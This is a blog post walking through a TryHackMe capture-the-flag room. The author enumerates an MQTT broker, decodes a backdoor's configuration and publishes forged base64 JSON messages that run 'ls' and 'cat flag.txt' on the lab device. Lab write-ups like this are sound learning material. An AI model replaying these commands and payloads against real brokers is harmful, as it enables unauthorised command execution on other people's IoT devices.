Open in app

Sign in

Write

Sign in

Bugged

SwayamInduShashi
2 min read1 day ago

--

Started with a basic nmap scan ……….. no result

Install and used rustscan(download docker “sudo apt install docker.io” “sudo apt install cargo” “cargo install rustscan”

there are many types of install and you may or may not be able to install it properly………..needs to be uninstalled several times. If you can install it within 1 hour Consider Yourself Lucky buy a Lottery Ticket. Otherwise you are in for a very looooooooong ride. Enjoy!!!

Thoroughly use Pentester’s GPT if you want to be quicker

run “rustscan -a 10.10.159.75 — config-path /home/kali/.rustscan.tom”

we got

PORT STATE SERVICE REASON 1883/tcp open mqtt syn-ack

run nmap on port 1883 “nmap -A -p 1883 10.10.159.75”

THEORY ON MQTT

MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, extremely simple, and lightweight messaging protocol, designed for constrained devices and low-bandwidth, high-latency, or unreliable networks. The design principles are to minimize network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal for the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.

Default port: 1883

Basic Information About ‘MQTT’

for more:- https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/

use “sudo nmap <ip> -p 1883 -sC -sV” For further details

PORT STATE SERVICE VERSION 1883/tcp open mosquitto version 2.0.14

install the tool ‘mosquitto’

“sudo apt-get install mosquitto mosquitto-clients -y”

then run “mosquitto_sub -h <ip> -p 1883 -t “#” “

we get :-

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==

decoded to :-

{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”registered_commands”:[“HELP”,”CMD”,”SYS”],”pub_topic”:”U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”,”sub_topic”:”XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”}

id — cdd1b1c0–1c40–4b0f-8e22–61b357548b7d

there are publishing code “U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”

commands like “HELP”,”CMD”,”SYS”

subscribing topic “XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”

while the command run on one terminal

mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204

on other terminal we will emulate the IOT device by

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_massage" -h 10.10.20.204

the message will be visible in the first terminal in base64 as

SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=

which is decoded as

<aside> 💡

Invalid message format. Format: base64({“id”: “<backdoor id>”, “cmd”: “<command>”, “arg”: “<argument>”})

</aside>

so we have to enter the scripts in this format and transform it into base64 to make a valid argument let’s cook

{“id”: “<backdoor id>”, “cmd”: “<command>”, “arg”: “<argument>”}

id: cdd1b1c0–1c40–4b0f-8e22–61b357548b7d

cmd: CMD

arg: ls

{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “ls”}

then to base64 which is

eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==

now putting it in the mosquitto_pub block

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==" -h 10.10.20.204

we get back

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbiJ9

which is

{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”flag.txt\n”}

we cook again

{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “cat flag.txt”}

change to base64

eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==

mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==" -h 10.10.20.204

we get

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9

which translated is

{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”flag{18d44fc0707ac8dc8be45bb83db54013}\n”}

Kistimaat !!!!!!!

Tryhackme Walkthrough
Pentesting
Cybersecurity
IoT

--

--

SwayamInduShashi
SwayamInduShashi

Written by SwayamInduShashi

1 Follower
2 Following

I'm a cyber-security enthusiast, student and a hands on experimenter. I'm going to try to test and learn something new and will be documenting my process.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams